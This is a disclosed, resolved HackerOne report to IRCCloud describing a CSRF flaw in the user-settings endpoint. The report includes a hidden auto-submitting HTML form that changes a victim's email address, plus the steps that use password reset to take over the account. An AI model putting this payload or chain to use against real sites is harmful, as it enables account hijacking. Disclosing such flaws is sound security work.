Full account takeover using CSRF and password reset

Disclosed: 2014-04-14 13:43:11 By melvin To irccloud
Unknown
Vulnerability Details
An attacker could take over any user account by doing the following things. 1) Exploit a CSRF vulnerability in `/chat/user-settings`. An attacker creates a webpage on a (non-IRCCloud) website (for example: http://example.com/cat.html) and inserts a (hidden) form like this: <form action="https://www.irccloud.com/chat/user-settings" method="post"> <input type="hidden" name="email" value="[email protected]"> <input type="hidden" name="realname" value="Doesn't Matter"> <input type="hidden" name="hwords" value=""> <input type="hidden" name="autoaway" value="1"> <input type="hidden" name="reqid" value="1"> <input type="hidden" name="session" value=""> <input type="submit"> <!-- some code to make the form submit automatically, in the background--> </form> 2) The attacker will send a link to the page to the victim. When the victim is logged in to IRCCloud, and clicks the link to the page, the e-mail of the victim on IRCCloud will be updated (in the background) to `[email protected]`. 3) The attacker will receive an e-mail to confirm the e-mail address (see: mail.png). 4) The attacker can now use the password reset functionality to change the password of the victim's account and gain full control over the account.
Actions
View on HackerOne
Report Stats
  • Report ID: 6910
  • State: Closed
  • Substate: resolved
  • Upvotes: 8
Share this report